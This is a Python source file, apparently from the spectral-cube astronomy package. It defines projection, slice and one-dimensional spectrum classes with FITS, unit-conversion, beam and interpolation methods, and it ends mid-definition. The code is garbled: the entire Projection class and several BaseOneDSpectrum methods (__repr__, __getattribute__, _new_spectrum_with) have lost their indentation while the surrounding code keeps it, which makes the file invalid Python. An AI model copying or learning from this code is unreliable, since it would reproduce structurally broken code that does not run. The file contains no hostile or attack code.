__all__ = ['LowerDimensionalObject', 'Projection', 'Slice', 'OneDSpectrum']
class LowerDimensionalObject(u.Quantity, BaseNDClass, HeaderMixinClass):
    """
    Generic class for 1D and 2D objects.
    """

    @property
    def hdu(self):
        """A `~astropy.io.fits.PrimaryHDU` of this object's data, with the
        unit written to BUNIT and beam keywords copied from ``meta`` when
        present."""
        if self.wcs is None:
            hdu = PrimaryHDU(self.value)
        else:
            hdu = PrimaryHDU(self.value, header=self.header)
        hdu.header['BUNIT'] = self.unit.to_string(format='fits')

        if 'beam' in self.meta:
            hdu.header.update(self.meta['beam'].to_header_keywords())

        return hdu

    def read(self, *args, **kwargs):
        # Reading is not implemented at this level; writing is provided
        # through the unified I/O registry below.
        raise NotImplementedError()

    write = UnifiedReadWriteMethod(LowerDimensionalObjectWrite)

    def __getslice__(self, start, end, increment=None):
        # I don't know why this is needed, but apparently one of the inherited
        # classes implements getslice, which forces us to overwrite it
        # I can't find any examples where __getslice__ is actually implemented,
        # though, so this seems like a deep and frightening bug.
        #log.debug("Getting a slice from {0} to {1}".format(start,end))
        return self.__getitem__(slice(start, end, increment))

    def __getitem__(self, key, **kwargs):
        """
        Return a new `~spectral_cube.lower_dimensional_structures.LowerDimensionalObject` of the same class while keeping
        other properties fixed.
        """
        new_qty = super(LowerDimensionalObject, self).__getitem__(key)

        if new_qty.ndim < 2:
            # do not return a projection
            return u.Quantity(new_qty)

        if self._wcs is not None:
            if ((isinstance(key, tuple) and
                 any(isinstance(k, slice) for k in key) and
                 len(key) > self.ndim)):
                # Example cases include: indexing tricks like [:,:,None]
                warnings.warn("Slice {0} cannot be used on this {1}-dimensional"
                              " array's WCS. If this is intentional, you "
                              " should use this {2}'s ``array`` or ``quantity``"
                              " attribute."
                              .format(key, self.ndim, type(self)),
                              SliceWarning
                             )
                return self.quantity[key]
            else:
                newwcs = self._wcs[key]
        else:
            newwcs = None

        new = self.__class__(value=new_qty.value,
                             unit=new_qty.unit,
                             copy=False,
                             wcs=newwcs,
                             meta=self._meta,
                             mask=(self._mask[key] if self._mask is not nomask
                                   else None),
                             header=self._header,
                             **kwargs)
        # NOTE(review): the attributes below are re-assigned even though the
        # constructor above already received them; the mask is set to
        # ``nomask`` here but ``None`` above — presumably intentional to
        # normalize the sentinel, but worth confirming.
        new._wcs = newwcs
        new._meta = self._meta
        new._mask=(self._mask[key] if self._mask is not nomask else nomask)
        new._header = self._header

        return new

    def __array_finalize__(self, obj):
        # Propagate spectral-cube attributes through numpy view/ufunc
        # creation paths; fall back to safe defaults when absent.
        self._wcs = getattr(obj, '_wcs', None)
        self._meta = getattr(obj, '_meta', None)
        self._mask = getattr(obj, '_mask', None)
        self._header = getattr(obj, '_header', None)
        self._spectral_unit = getattr(obj, '_spectral_unit', None)
        self._fill_value = getattr(obj, '_fill_value', np.nan)
        self._wcs_tolerance = getattr(obj, '_wcs_tolerance', 0.0)
        if isinstance(obj, VaryingResolutionOneDSpectrum):
            self._beams = getattr(obj, '_beams', None)
        else:
            self._beam = getattr(obj, '_beam', None)
        super(LowerDimensionalObject, self).__array_finalize__(obj)

    @property
    def __array_priority__(self):
        # Ensure our subclass wins over plain Quantity in mixed operations.
        return super(LowerDimensionalObject, self).__array_priority__*2

    @property
    def array(self):
        """
        Get a pure array representation of the LDO. Useful when multiplying
        and using numpy indexing tricks.
        """
        return np.asarray(self)

    @property
    def _data(self):
        # the _data property is required by several other mixins
        # (which probably means defining it here is a bad design)
        return self.array

    @property
    def quantity(self):
        """
        Get a pure `~astropy.units.Quantity` representation of the LDO.
        """
        return u.Quantity(self)

    def to(self, unit, equivalencies=[], freq=None):
        """
        Return a new `~spectral_cube.lower_dimensional_structures.Projection`
        of the same class with the specified unit.

        See `astropy.units.Quantity.to` for further details.
        """
        if not isinstance(unit, u.Unit):
            unit = u.Unit(unit)

        if unit == self.unit:
            # No copying
            return self

        if ((self.unit.is_equivalent(u.Jy / u.beam) and
             not any({u.Jy/u.beam, u.K}.issubset(set(eq)) for eq in equivalencies))):
            # the 'not any' above checks that there is not already a defined
            # Jy<->K equivalency. If there is, the code below is redundant
            # and will cause problems.

            if hasattr(self, 'beams'):
                factor = (self.jtok_factors(equivalencies=equivalencies) *
                          (self.unit*u.beam).to(u.Jy))
            else:
                # replace "beam" with the actual beam
                if not hasattr(self, 'beam'):
                    raise ValueError("To convert objects with Jy/beam units, "
                                     "the object needs to have a beam defined.")
                brightness_unit = self.unit * u.beam

                # create a beam equivalency for brightness temperature
                if freq is None:
                    try:
                        freq = self.with_spectral_unit(u.Hz).spectral_axis
                    except AttributeError:
                        raise TypeError("Object of type {0} has no spectral "
                                        "information. `freq` must be provided for"
                                        " unit conversion from Jy/beam"
                                        .format(type(self)))
                else:
                    if not freq.unit.is_equivalent(u.Hz):
                        raise u.UnitsError("freq must be given in equivalent "
                                           "frequency units.")

                bmequiv = self.beam.jtok_equiv(freq)
                # backport to handle astropy < 3: the beam equivalency was only
                # modified to handle jy/beam in astropy 3
                if bmequiv[0] == u.Jy:
                    bmequiv.append([u.Jy/u.beam, u.K, bmequiv[2], bmequiv[3]])

                factor = brightness_unit.to(unit,
                                            equivalencies=bmequiv + list(equivalencies))
        else:
            # scaling factor
            factor = self.unit.to(unit, equivalencies=equivalencies)

        converted_array = (self.quantity * factor).value

        # use private versions of variables, not the generated property
        # versions
        # Not entirely sure the use of __class__ here is kosher, but we do want
        # self.__class__, not super()
        new = self.__class__(value=converted_array, unit=unit, copy=True,
                             wcs=self._wcs, meta=self._meta, mask=self._mask,
                             header=self._header)

        return new

    @property
    def _mask(self):
        """ Annoying hack to deal with np.ma.core.is_mask failures (I don't
        like using __ but I think it's necessary here)"""
        if self.__mask is None:
            # need this to be *exactly* the numpy boolean False
            return nomask
        return self.__mask

    @_mask.setter
    def _mask(self, value):
        self.__mask = value

    def shrink_mask(self):
        """
        Copy of the numpy masked_array shrink_mask method.  This is essentially
        a hack needed for matplotlib to show images.
        """
        m = self._mask
        if m.ndim and not m.any():
            self._mask = nomask
        return self

    def _initial_set_mask(self, mask):
        """
        Helper tool to validate mask when originally setting it in __new__

        Note that because this is intended to be used in __new__, order
        matters: ``self`` must have ``_wcs``, for example.
        """
        if mask is None:
            mask = BooleanArrayMask(np.ones_like(self.value, dtype=bool),
                                    self._wcs, shape=self.value.shape)
        elif isinstance(mask, np.ndarray):
            if mask.shape != self.value.shape:
                raise ValueError("Mask shape must match the {0} shape."
                                 .format(self.__class__.__name__)
                                )
            mask = BooleanArrayMask(mask, self._wcs, shape=self.value.shape)
        elif isinstance(mask, MaskBase):
            pass
        else:
            raise TypeError("mask of type {} is not a supported mask "
                            "type.".format(type(mask)))

        # Validate the mask before setting
        mask._validate_wcs(new_data=self.value, new_wcs=self._wcs,
                           wcs_tolerance=self._wcs_tolerance)

        self._mask = mask
class Projection(LowerDimensionalObject, SpatialCoordMixinClass,
MaskableArrayMixinClass, BeamMixinClass):
def __new__(cls, value, unit=None, dtype=None, copy=True, wcs=None,
meta=None, mask=None, header=None, beam=None,
fill_value=np.nan, read_beam=False, wcs_tolerance=0.0):
if np.asarray(value).ndim != 2:
raise ValueError("value should be a 2-d array")
if wcs is not None and wcs.wcs.naxis != 2:
raise ValueError("wcs should have two dimension")
self = u.Quantity.__new__(cls, value, unit=unit, dtype=dtype,
copy=copy).view(cls)
self._wcs = wcs
self._meta = {} if meta is None else meta
self._wcs_tolerance = wcs_tolerance
self._initial_set_mask(mask)
self._fill_value = fill_value
if header is not None:
self._header = header
else:
self._header = Header()
if beam is None:
if "beam" in self.meta:
beam = self.meta['beam']
elif read_beam:
beam = cube_utils.try_load_beam(header)
if beam is None:
warnings.warn("Cannot load beam from header.",
BeamWarning
)
if beam is not None:
self.beam = beam
self.meta['beam'] = beam
# TODO: Enable header updating when non-celestial slices are
# properly handled in the WCS object.
# self._header.update(beam.to_header_keywords())
self._cache = {}
return self
def with_beam(self, beam):
'''
Attach a new beam object to the Projection.
Parameters
----------
beam : `~radio_beam.Beam`
A new beam object.
'''
meta = self.meta.copy()
meta['beam'] = beam
return self._new_projection_with(beam=beam, meta=meta)
def with_fill_value(self, fill_value):
"""
Create a new :class:`Projection` or :class:`Slice` with a different
``fill_value``.
"""
return self._new_projection_with(fill_value=fill_value)
@property
def _new_thing_with(self):
return self._new_projection_with
def _new_projection_with(self, data=None, wcs=None, mask=None, meta=None,
fill_value=None, spectral_unit=None, unit=None,
header=None, wcs_tolerance=None, beam=None,
**kwargs):
data = self._data if data is None else data
if unit is None and hasattr(data, 'unit'):
if data.unit != self.unit:
raise u.UnitsError("New data unit '{0}' does not"
" match unit '{1}'. You can"
" override this by specifying the"
" `unit` keyword."
.format(data.unit, self.unit))
unit = data.unit
elif unit is None:
unit = self.unit
elif unit is not None:
# convert string units to Units
if not isinstance(unit, u.Unit):
unit = u.Unit(unit)
if hasattr(data, 'unit'):
if u.Unit(unit) != data.unit:
raise u.UnitsError("The specified new cube unit '{0}' "
"does not match the input unit '{1}'."
.format(unit, data.unit))
else:
data = u.Quantity(data, unit=unit, copy=False)
wcs = self._wcs if wcs is None else wcs
mask = self._mask if mask is None else mask
if meta is None:
meta = {}
meta.update(self._meta)
if unit is not None:
meta['BUNIT'] = unit.to_string(format='FITS')
fill_value = self._fill_value if fill_value is None else fill_value
if beam is None:
if hasattr(self, 'beam'):
beam = self.beam
newproj = self.__class__(value=data, wcs=wcs, mask=mask, meta=meta,
unit=unit, fill_value=fill_value,
header=header or self._header,
wcs_tolerance=wcs_tolerance or self._wcs_tolerance,
beam=beam,
**kwargs)
return newproj
@staticmethod
def from_hdu(hdu):
'''
Return a projection from a FITS HDU.
'''
if isinstance(hdu, HDUList):
hdul = hdu
hdu = hdul[0]
if not len(hdu.data.shape) == 2:
raise ValueError("HDU must contain two-dimensional data.")
meta = {}
mywcs = wcs.WCS(hdu.header)
if "BUNIT" in hdu.header:
unit = convert_bunit(hdu.header["BUNIT"])
meta["BUNIT"] = hdu.header["BUNIT"]
else:
unit = None
beam = cube_utils.try_load_beam(hdu.header)
self = Projection(hdu.data, unit=unit, wcs=mywcs, meta=meta,
header=hdu.header, beam=beam)
return self
def quicklook(self, filename=None, use_aplpy=True, aplpy_kwargs={}):
"""
Use `APLpy <https://pypi.python.org/pypi/APLpy>`_ to make a quick-look
image of the projection. This will make the ``FITSFigure`` attribute
available.
If there are unmatched celestial axes, this will instead show an image
without axis labels.
Parameters
----------
filename : str or Non
Optional - the filename to save the quicklook to.
"""
if use_aplpy:
try:
if not hasattr(self, 'FITSFigure'):
import aplpy
self.FITSFigure = aplpy.FITSFigure(self.hdu,
**aplpy_kwargs)
self.FITSFigure.show_grayscale()
self.FITSFigure.add_colorbar()
if filename is not None:
self.FITSFigure.save(filename)
except (wcs.InconsistentAxisTypesError, ImportError):
self._quicklook_mpl(filename=filename)
else:
self._quicklook_mpl(filename=filename)
def _quicklook_mpl(self, filename=None):
from matplotlib import pyplot
self.figure = pyplot.gcf()
self.image = pyplot.imshow(self.value)
if filename is not None:
self.figure.savefig(filename)
def convolve_to(self, beam, convolve=convolution.convolve_fft):
"""
Convolve the image to a specified beam.
Parameters
----------
beam : `radio_beam.Beam`
The beam to convolve to
convolve : function
The astropy convolution function to use, either
`astropy.convolution.convolve` or
`astropy.convolution.convolve_fft`
Returns
-------
proj : `Projection`
A Projection convolved to the given ``beam`` object.
"""
self._raise_wcs_no_celestial()
if not hasattr(self, 'beam'):
raise ValueError("No beam is contained in Projection.meta.")
# Check if the beams are the same.
if beam == self.beam:
warnings.warn("The given beam is identical to the current beam. "
"Skipping convolution.")
return self
pixscale = wcs.utils.proj_plane_pixel_area(self.wcs.celestial)**0.5 * u.deg
convolution_kernel = \
beam.deconvolve(self.beam).as_kernel(pixscale)
newdata = convolve(self.value, convolution_kernel,
normalize_kernel=True)
self = Projection(newdata, unit=self.unit, wcs=self.wcs,
meta=self.meta, header=self.header,
beam=beam)
return self
def reproject(self, header, order='bilinear'):
"""
Reproject the image into a new header.
Parameters
----------
header : `astropy.io.fits.Header`
A header specifying a cube in valid WCS
order : int or str, optional
The order of the interpolation (if ``mode`` is set to
``'interpolation'``). This can be either one of the following
strings:
* 'nearest-neighbor'
* 'bilinear'
* 'biquadratic'
* 'bicubic'
or an integer. A value of ``0`` indicates nearest neighbor
interpolation.
"""
self._raise_wcs_no_celestial()
try:
from reproject.version import version
except ImportError:
raise ImportError("Requires the reproject package to be"
" installed.")
# Need version > 0.2 to work with cubes
from distutils.version import LooseVersion
if LooseVersion(version) < "0.3":
raise Warning("Requires version >=0.3 of reproject. The current "
"version is: {}".format(version))
from reproject import reproject_interp
# TODO: Find the minimal footprint that contains the header and only reproject that
# (see FITS_tools.regrid_cube for a guide on how to do this)
newwcs = wcs.WCS(header)
shape_out = [header['NAXIS{0}'.format(i + 1)] for i in range(header['NAXIS'])][::-1]
newproj, newproj_valid = reproject_interp((self.value,
self.header),
newwcs,
shape_out=shape_out,
order=order)
self = Projection(newproj, unit=self.unit, wcs=newwcs,
meta=self.meta, header=header,
read_beam=True)
return self
    def subimage(self, xlo='min', xhi='max', ylo='min', yhi='max'):
        """
        Extract a region spatially.

        Parameters
        ----------
        [xy]lo/[xy]hi : int or `astropy.units.Quantity` or `min`/`max`
            The endpoints to extract.  If given as a quantity, will be
            interpreted as World coordinates.  If given as a string or
            int, will be interpreted as pixel coordinates.
        """
        self._raise_wcs_no_celestial()

        # Resolve the 'min'/'max' sentinels to the full pixel range.
        limit_dict = {'xlo': 0 if xlo == 'min' else xlo,
                      'ylo': 0 if ylo == 'min' else ylo,
                      'xhi': self.shape[1] if xhi == 'max' else xhi,
                      'yhi': self.shape[0] if yhi == 'max' else yhi}
        # numpy axis index for each named spatial dimension (y is axis 0).
        dims = {'x': 1,
                'y': 0}

        # Quantity limits are world coordinates and must be angular.
        for val in (xlo, ylo, xhi, yhi):
            if hasattr(val, 'unit') and not val.unit.is_equivalent(u.degree):
                raise u.UnitsError("The X and Y slices must be specified in "
                                   "degree-equivalent units.")

        for lim in limit_dict:
            limval = limit_dict[lim]
            if hasattr(limval, 'unit'):
                dim = dims[lim[0]]
                # Build an index that extracts the 1D world-coordinate
                # "spine" along this dimension (the other axis pinned to 0).
                sl = [slice(0, 1)]
                sl.insert(dim, slice(None))
                spine = self.world[tuple(sl)][dim]
                # Nearest pixel to the requested world coordinate.
                val = np.argmin(np.abs(limval - spine))
                if limval > spine.max() or limval < spine.min():
                    # Out-of-range limits silently clamp to the nearest edge.
                    pass
                    # log.warn("The limit {0} is out of bounds."
                    #          " Using min/max instead.".format(lim))
                if lim[1:] == 'hi':
                    # End-inclusive indexing: need to add one for the high
                    # slice
                    limit_dict[lim] = val + 1
                else:
                    limit_dict[lim] = val

        # Assemble numpy-ordered slices: y first, then x.
        slices = [slice(limit_dict[xx + 'lo'], limit_dict[xx + 'hi'])
                  for xx in 'yx']

        return self[tuple(slices)]
    def to(self, unit, equivalencies=[], freq=None):
        """
        Return a new `~spectral_cube.lower_dimensional_structures.Projection`
        of the same class with the specified unit.

        See `astropy.units.Quantity.to` for further details.

        ``freq`` is forwarded to the parent implementation (e.g. for
        brightness-temperature conversions that need a frequency).
        """
        return super(Projection, self).to(unit, equivalencies, freq)
# A slice is just like a projection in every way
class Slice(Projection):
    """A single spatial slice of a cube; behaves identically to
    `Projection` in every way."""
    pass
class BaseOneDSpectrum(LowerDimensionalObject, MaskableArrayMixinClass,
                       SpectralAxisMixinClass):
    """
    Properties shared between OneDSpectrum and VaryingResolutionOneDSpectrum.
    """
    def __new__(cls, value, unit=None, dtype=None, copy=True, wcs=None,
                meta=None, mask=None, header=None, spectral_unit=None,
                fill_value=np.nan, wcs_tolerance=0.0):
        """
        Create a new one-dimensional spectrum.

        Parameters
        ----------
        value : array-like
            One-dimensional spectral data.
        unit : `~astropy.units.Unit` or str, optional
            Flux unit of ``value``.
        wcs : `~astropy.wcs.WCS`, optional
            A one-dimensional (spectral) WCS.
        mask, header, spectral_unit, fill_value, wcs_tolerance :
            Standard lower-dimensional-object attributes; the spectral unit
            falls back to the header ``CUNIT1`` and then to the WCS.

        Raises
        ------
        ValueError
            If ``value`` is not 1-d, or if ``wcs`` is given but is not
            one-dimensional.
        """
        #log.debug("Creating a OneDSpectrum with __new__")
        if np.asarray(value).ndim != 1:
            raise ValueError("value should be a 1-d array")

        if wcs is not None and wcs.wcs.naxis != 1:
            # BUG FIX: the message previously said "wcs should have two
            # dimension", contradicting the naxis != 1 check above.
            raise ValueError("wcs should have one dimension")

        self = u.Quantity.__new__(cls, value, unit=unit, dtype=dtype,
                                  copy=copy).view(cls)
        self._wcs = wcs
        self._meta = {} if meta is None else meta
        self._wcs_tolerance = wcs_tolerance

        self._initial_set_mask(mask)

        self._fill_value = fill_value
        if header is not None:
            self._header = header
        else:
            self._header = Header()

        # Determine the spectral unit: explicit argument wins, then the
        # header's CUNIT1, then the WCS cunit.
        self._spectral_unit = spectral_unit
        if spectral_unit is None:
            if 'CUNIT1' in self._header:
                self._spectral_unit = u.Unit(self._header['CUNIT1'])
            elif self._wcs is not None:
                self._spectral_unit = u.Unit(self._wcs.wcs.cunit[0])

        return self
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
arrstr = np.array2string(self.filled_data[:].value, separator=',',
prefix=prefixstr)
return '{0}{1}{2:s}>'.format(prefixstr, arrstr, self._unitstr)
    @staticmethod
    def from_hdu(hdu):
        '''
        Return a OneDSpectrum from a FITS HDU or HDU list.
        '''
        if isinstance(hdu, HDUList):
            hdul = hdu
            hdu = hdul[0]
        else:
            hdul = HDUList([hdu])

        if not len(hdu.data.shape) == 1:
            raise ValueError("HDU must contain one-dimensional data.")

        meta = {}

        mywcs = wcs.WCS(hdu.header)

        if "BUNIT" in hdu.header:
            unit = convert_bunit(hdu.header["BUNIT"])
            meta["BUNIT"] = hdu.header["BUNIT"]
        else:
            unit = None

        # Look for a per-channel beams table in the HDU list, silencing
        # FITS warnings during the probe.
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore', category=FITSWarning)
            beam = cube_utils.try_load_beams(hdul)

        # try_load_beams returns a sequence when a beams table exists;
        # anything without __len__ is not a per-channel table.
        if hasattr(beam, '__len__'):
            beams = beam
        else:
            beams = None

        if beams is not None:
            self = VaryingResolutionOneDSpectrum(hdu.data, unit=unit,
                                                 wcs=mywcs, meta=meta,
                                                 header=hdu.header,
                                                 beams=beams)
        else:
            # Fall back to a single beam read from header keywords.
            beam = cube_utils.try_load_beam(hdu.header)
            self = OneDSpectrum(hdu.data, unit=unit, wcs=mywcs, meta=meta,
                                header=hdu.header, beam=beam)

        return self
    @property
    def header(self):
        """
        FITS header for this spectrum, with the spectral WCS keywords
        (CDELT1/CRVAL1/CUNIT1) rescaled to match ``self._spectral_unit``.
        """
        header = super(BaseOneDSpectrum, self).header

        # Preserve the spectrum's spectral units
        if 'CUNIT1' in header and self._spectral_unit != u.Unit(header['CUNIT1']):
            spectral_scale = spectral_axis.wcs_unit_scale(self._spectral_unit)
            header['CDELT1'] *= spectral_scale
            header['CRVAL1'] *= spectral_scale
            header['CUNIT1'] = self.spectral_axis.unit.to_string(format='FITS')

        return header
    @property
    def spectral_axis(self):
        """
        A `~astropy.units.Quantity` array containing the central values of
        each channel along the spectral axis.
        """
        if self._wcs is None:
            # No WCS: fall back to dimensionless channel indices.
            spec_axis = np.arange(self.size) * u.one
        else:
            spec_axis = self.wcs.wcs_pix2world(np.arange(self.size), 0)[0] * \
                u.Unit(self.wcs.wcs.cunit[0])
            if self._spectral_unit is not None:
                spec_axis = spec_axis.to(self._spectral_unit)

        return spec_axis
    def quicklook(self, filename=None, drawstyle='steps-mid', **kwargs):
        """
        Plot the spectrum with current spectral units in the currently open
        figure

        kwargs are passed to `matplotlib.pyplot.plot`

        Parameters
        ----------
        filename : str or None
            Optional - the filename to save the quicklook to.
        drawstyle : str
            Matplotlib draw style for the line (default 'steps-mid').
        """
        from matplotlib import pyplot
        ax = pyplot.gca()
        ax.plot(self.spectral_axis, self.filled_data[:].value,
                drawstyle=drawstyle, **kwargs)
        ax.set_xlabel(self.spectral_axis.unit.to_string(format='latex'))
        ax.set_ylabel(self.unit)
        if filename is not None:
            pyplot.gcf().savefig(filename)
    def with_spectral_unit(self, unit, velocity_convention=None,
                           rest_value=None):
        """
        Return a copy of this spectrum with its spectral axis converted to
        ``unit`` (e.g. frequency <-> velocity, using ``velocity_convention``
        and ``rest_value`` where needed).
        """
        newwcs, newmeta = self._new_spectral_wcs(unit,
                                                 velocity_convention=velocity_convention,
                                                 rest_value=rest_value)

        newheader = self._nowcs_header.copy()
        newheader.update(newwcs.to_header())
        # Rescale CDELT1 from the WCS unit into the requested unit.
        wcs_cunit = u.Unit(newheader['CUNIT1'])
        newheader['CUNIT1'] = unit.to_string(format='FITS')
        newheader['CDELT1'] *= wcs_cunit.to(unit)

        if self._mask is not None:
            newmask = self._mask.with_spectral_unit(unit,
                                                    velocity_convention=velocity_convention,
                                                    rest_value=rest_value)
            newmask._wcs = newwcs
        else:
            newmask = None

        return self._new_spectrum_with(wcs=newwcs, spectral_unit=unit,
                                       mask=newmask, meta=newmeta,
                                       header=newheader)
    def __getitem__(self, key, **kwargs):
        # Ideally, this could just be in VaryingResolutionOneDSpectrum,
        # but it's about the code is about the same length by just
        # keeping it here.
        try:
            # Slice the per-channel beams too when they exist (the
            # varying-resolution subclass); plain spectra have no .beams.
            kwargs['beams'] = self.beams[key]
        except (AttributeError, TypeError):
            pass

        new_qty = super(BaseOneDSpectrum, self).__getitem__(key)

        if isinstance(key, slice):
            # A slice preserves a valid 1D WCS, so return a full spectrum
            # with a correspondingly sliced WCS and mask.
            new = self.__class__(value=new_qty.value,
                                 unit=new_qty.unit,
                                 copy=False,
                                 wcs=wcs_utils.slice_wcs(self._wcs, key,
                                                         shape=self.shape),
                                 meta=self._meta,
                                 mask=(self._mask[key]
                                       if self._mask is not nomask
                                       else nomask),
                                 header=self._header,
                                 wcs_tolerance=self._wcs_tolerance,
                                 fill_value=self.fill_value,
                                 **kwargs)
            return new
        else:
            # Scalar / fancy indexing: return a plain Quantity with
            # masked-out values blanked to NaN.
            if self._mask is not nomask:
                # Kind of a hack; this is probably inefficient
                bad = self._mask.exclude()[key]
                new_qty[bad] = np.nan
            return new_qty
def __getattribute__(self, attrname):
# This is a hack to handle dimensionality-reducing functions
# We want spectrum.max() to return a Quantity, not a spectrum
# Long-term, we really want `OneDSpectrum` to not inherit from
# `Quantity`, but for now this approach works.... we just have
# to add more functions to this list.
if attrname in ('min', 'max', 'std', 'mean', 'sum', 'cumsum',
'nansum', 'ptp', 'var'):
return getattr(self.quantity, attrname)
else:
return super(BaseOneDSpectrum, self).__getattribute__(attrname)
    def spectral_interpolate(self, spectral_grid,
                             suppress_smooth_warning=False,
                             fill_value=None):
        """
        Resample the spectrum onto a specific grid

        Parameters
        ----------
        spectral_grid : array
            An array of the spectral positions to regrid onto
        suppress_smooth_warning : bool
            If disabled, a warning will be raised when interpolating onto a
            grid that does not nyquist sample the existing grid.  Disable this
            if you have already appropriately smoothed the data.
        fill_value : float
            Value for extrapolated spectral values that lie outside of
            the spectral range defined in the original data.  The
            default is to use the nearest spectral channel in the
            cube.

        Returns
        -------
        spectrum : OneDSpectrum
        """
        assert spectral_grid.ndim == 1

        inaxis = self.spectral_axis.to(spectral_grid.unit)

        indiff = np.mean(np.diff(inaxis))
        outdiff = np.mean(np.diff(spectral_grid))

        # account for reversed axes
        # np.interp requires ascending inputs, so both grids are flipped to
        # ascending order here and the output flipped back via `outslice`.
        if outdiff < 0:
            spectral_grid = spectral_grid[::-1]
            outdiff = np.mean(np.diff(spectral_grid))
            outslice = slice(None, None, -1)
        else:
            outslice = slice(None, None, 1)

        specslice = slice(None) if indiff >= 0 else slice(None, None, -1)
        inaxis = inaxis[specslice]
        indiff = np.mean(np.diff(inaxis))

        # insanity checks
        if indiff < 0 or outdiff < 0:
            raise ValueError("impossible.")

        assert np.all(np.diff(spectral_grid) > 0)
        assert np.all(np.diff(inaxis) > 0)

        np.testing.assert_allclose(np.diff(spectral_grid), outdiff,
                                   err_msg="Output grid must be linear")

        # Warn when the output grid undersamples (coarser than Nyquist)
        # the input grid.
        if outdiff > 2 * indiff and not suppress_smooth_warning:
            warnings.warn("Input grid has too small a spacing. The data should "
                          "be smoothed prior to resampling.",
                          SmoothingWarning
                         )

        newspec = np.empty([spectral_grid.size], dtype=self.dtype)
        newmask = np.empty([spectral_grid.size], dtype='bool')

        newspec[outslice] = np.interp(spectral_grid.value, inaxis.value,
                                      self.filled_data[specslice].value,
                                      left=fill_value, right=fill_value)

        mask = self.mask.include()

        if all(mask):
            newmask = np.ones([spectral_grid.size], dtype='bool')
        else:
            # Interpolate the boolean mask as floats; any nonzero overlap
            # counts as included.
            interped = np.interp(spectral_grid.value,
                                 inaxis.value, mask[specslice]) > 0
            newmask[outslice] = interped

        # Build a fresh spectral WCS describing the (possibly re-reversed)
        # output grid.
        newwcs = self.wcs.deepcopy()
        newwcs.wcs.crpix[0] = 1
        newwcs.wcs.crval[0] = spectral_grid[0].value if outslice.step > 0 \
            else spectral_grid[-1].value
        newwcs.wcs.cunit[0] = spectral_grid.unit.to_string(format='FITS')
        newwcs.wcs.cdelt[0] = outdiff.value if outslice.step > 0 \
            else -outdiff.value
        newwcs.wcs.set()

        newheader = self._nowcs_header.copy()
        newheader.update(newwcs.to_header())
        wcs_cunit = u.Unit(newheader['CUNIT1'])
        newheader['CUNIT1'] = spectral_grid.unit.to_string(format='FITS')
        newheader['CDELT1'] *= wcs_cunit.to(spectral_grid.unit)

        newbmask = BooleanArrayMask(newmask, wcs=newwcs)

        return self._new_spectrum_with(data=newspec, wcs=newwcs, mask=newbmask,
                                       header=newheader,
                                       spectral_unit=spectral_grid.unit)
    def spectral_smooth(self, kernel,
                        convolve=convolution.convolve,
                        **kwargs):
        """
        Smooth the spectrum

        Parameters
        ----------
        kernel : `~astropy.convolution.Kernel1D`
            A 1D kernel from astropy
        convolve : function
            The astropy convolution function to use, either
            `astropy.convolution.convolve` or
            `astropy.convolution.convolve_fft`
        kwargs : dict
            Passed to the convolve function

        Returns
        -------
        A new spectrum of the same class with smoothed data.
        """
        newspec = convolve(self.value, kernel, normalize_kernel=True, **kwargs)

        return self._new_spectrum_with(data=newspec)
    def to(self, unit, equivalencies=[]):
        """
        Return a new `~spectral_cube.lower_dimensional_structures.OneDSpectrum`
        of the same class with the specified unit.

        See `astropy.units.Quantity.to` for further details.
        """
        # freq=None: spectra carry their own spectral axis, so no single
        # frequency is supplied here.
        return super(BaseOneDSpectrum, self).to(unit, equivalencies, freq=None)
    def with_fill_value(self, fill_value):
        """
        Create a new :class:`OneDSpectrum` with a different ``fill_value``.
        """
        return self._new_spectrum_with(fill_value=fill_value)

    @property
    def _new_thing_with(self):
        # Generic alias used by shared mixin code that operates on cubes
        # and spectra alike.
        return self._new_spectrum_with
def _new_spectrum_with(self, data=None, wcs=None, mask=None, meta=None,
fill_value=None, spectral_unit=None, unit=None,
header=None, wcs_tolerance=None,
**kwargs):
data = self._data if data is None else data
if unit is None and hasattr(data, 'unit'):
if data.unit != self.unit:
raise u.UnitsError("New data unit '{0}' does not"
" match unit '{1}'. You can"
" override this by specifying the"
" `unit` keyword."
.format(data.unit, self.unit))
unit = data.unit
elif unit is None:
unit = self.unit
elif unit is not None:
# convert string units to Units
if not isinstance(unit, u.Unit):
unit = u.Unit(unit)
if hasattr(data, 'unit'):
if u.Unit(unit) != data.unit:
raise u.UnitsError("The specified new cube unit '{0}' "
"does not match the input unit '{1}'."
.format(unit, data.unit))
else:
data = u.Quantity(data, unit=unit, copy=False)
wcs = self._wcs if wcs is None else wcs
mask = self._mask if mask is None else mask
if meta is None:
meta = {}
meta.update(self._meta)
if unit is not None:
meta['BUNIT'] = unit.to_string(format='FITS')
fill_value = self._fill_value if fill_value is None else fill_value
spectral_unit = self._spectral_unit if spectral_unit is None else u.Unit(spectral_unit)
spectrum = self.__class__(value=data, wcs=wcs, mask=mask, meta=meta,
unit=unit, fill_value=fill_value,
header=header or self._header,
wcs_tolerance=wcs_tolerance or self._wcs_tolerance,
**kwargs)
spectrum._spectral_unit = spectral_unit
return spectrum
class OneDSpectrum(BaseOneDSpectrum, BeamMixinClass):
    """A one-dimensional spectrum with a single (constant) beam."""

    def __new__(cls, value, beam=None, read_beam=False, **kwargs):
        self = super(OneDSpectrum, cls).__new__(cls, value, **kwargs)

        # Beam resolution order: explicit argument, then meta, then
        # (optionally) the FITS header.
        if beam is None:
            if "beam" in self.meta:
                beam = self.meta['beam']
            elif read_beam:
                beam = cube_utils.try_load_beam(self.header)
                if beam is None:
                    warnings.warn("Cannot load beam from header.",
                                  BeamWarning
                                 )

        if beam is not None:
            self.beam = beam
            self.meta['beam'] = beam
        # TODO: warn for no beam?

        self._cache = {}

        return self

    def _new_spectrum_with(self, **kwargs):
        # Carry the beam through to derived spectra unless the caller
        # supplies a replacement.
        beam = kwargs.pop('beam', None)
        if 'beam' in self._meta and beam is None:
            beam = self.beam
        out = super(OneDSpectrum, self)._new_spectrum_with(beam=beam, **kwargs)

        return out

    def with_beam(self, beam):
        '''
        Attach a new beam object to the OneDSpectrum.

        Parameters
        ----------
        beam : `~radio_beam.Beam`
            A new beam object.
        '''
        meta = self.meta.copy()
        meta['beam'] = beam

        return self._new_spectrum_with(beam=beam, meta=meta)
class VaryingResolutionOneDSpectrum(BaseOneDSpectrum, MultiBeamMixinClass):
    """A one-dimensional spectrum with a (possibly different) beam per
    channel."""

    def __new__(cls, value, beams=None, read_beam=False, goodbeams_mask=None, **kwargs):
